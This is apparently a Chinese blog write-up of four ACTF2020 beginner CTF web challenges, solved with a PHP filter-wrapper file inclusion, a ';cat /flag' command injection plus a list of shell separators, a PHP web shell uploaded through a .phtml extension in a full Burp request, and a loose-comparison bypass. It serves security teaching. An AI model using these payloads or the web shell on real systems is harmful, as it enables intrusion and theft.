0
点赞
收藏
分享

微信扫一扫

[WP][ACTF2020 新生赛]

奋斗De奶爸 2022-10-27 阅读 143


文章目录

  • ​​[ACTF2020 新生赛]Include​​
  • ​​[ACTF2020 新生赛]Exec​​
  • ​​[ACTF2020 新生赛]Upload​​
  • ​​[ACTF2020 新生赛]BackupFile​​

[ACTF2020 新生赛]Include

打开环境,点击tips出现

Can you find out the flag?

观察到浏览器url的后缀变化​​?file=flag.php​

因此不难得到,应该用伪协议进行编码读取

http://a7631c34-a214-4e36-9184-e1957ecc34c6.node3.buuoj.cn/?file=php://filter/read=convert.base64-encode/resource=flag.php

之后base64解码,得到flag

PD9waHAKZWNobyAiQ2FuIHlvdSBmaW5kIG91dCB0aGUgZmxhZz8iOwovL2ZsYWd7YWE1YjZkMzUtZjA3ZS00NWU5LWIwNjMtZGMwOTI5NDNlYzY4fQo=

[ACTF2020 新生赛]Exec

看标题猜到是RCE

无过滤,输入

127.0.0.1;cat /flag

另外记录一下

;前面和后面命令都要执行,无论前面真假
|直接执行后面的语句
||如果前面命令是错的那么就执行后面的语句,否则只执行前面的语句
&前面和后面命令都要执行,无论前面真假
&&如果前面为假,后面的命令也不执行,如果前面为真则执行两条命令

[ACTF2020 新生赛]Upload

嗯,考点是文件上传,尝试php3,php5失败,php7成功但是页面没有渲染,之后尝试phtml后缀成功,下面是BurpSuite请求包

POST / HTTP/1.1
Host: b85d37f5-3d44-4eab-a428-6633d528130c.node3.buuoj.cn
Content-Length: 311
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://b85d37f5-3d44-4eab-a428-6633d528130c.node3.buuoj.cn
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryyhK7HZ5Xq4Qc0HxB
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://b85d37f5-3d44-4eab-a428-6633d528130c.node3.buuoj.cn/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: UM_distinctid=176eeefef524b1-06a7c2cac68426-3323765-144000-176eeefef5397e
Connection: close

------WebKitFormBoundaryyhK7HZ5Xq4Qc0HxB
Content-Disposition: form-data; name="upload_file"; filename="2.phtml"
Content-Type: image/png

<?php eval($_POST[1]); ?>
------WebKitFormBoundaryyhK7HZ5Xq4Qc0HxB
Content-Disposition: form-data; name="submit"

upload
------WebKitFormBoundaryyhK7HZ5Xq4Qc0HxB--

根据提示./uplo4d/04b83e34e98d42802696941d27bc6c12.phtml

访问后用1为参数指行RCE即可

1=system(‘cat /flag’);

获得flag

flag{8da8cae1-3277-4853-a45e-92f503b33c2a}

[ACTF2020 新生赛]BackupFile

看题目,再加上是php,因此拼接后缀得到源码http://70ef8aeb-1320-48e3-a533-1045b770b03e.node3.buuoj.cn/index.php.bak

审查源码,key必须是数字,并且必须与str相等,考点是弱比较,采用get请求key=123即可

<?php
include_once "flag.php";

if(isset($_GET['key'])) {
$key = $_GET['key'];
if(!is_numeric($key)) {
exit("Just num!");
}
$key = intval($key);
$str = "123ffwsfwefwf24r2f32ir23jrw923rskfjwtsw54w3";
if($key == $str) {
echo $flag;
}
}
else {
echo "Try to find out source file!";
}

访问即可得到flag

http://url/?key=123


举报

相关推荐

0 条评论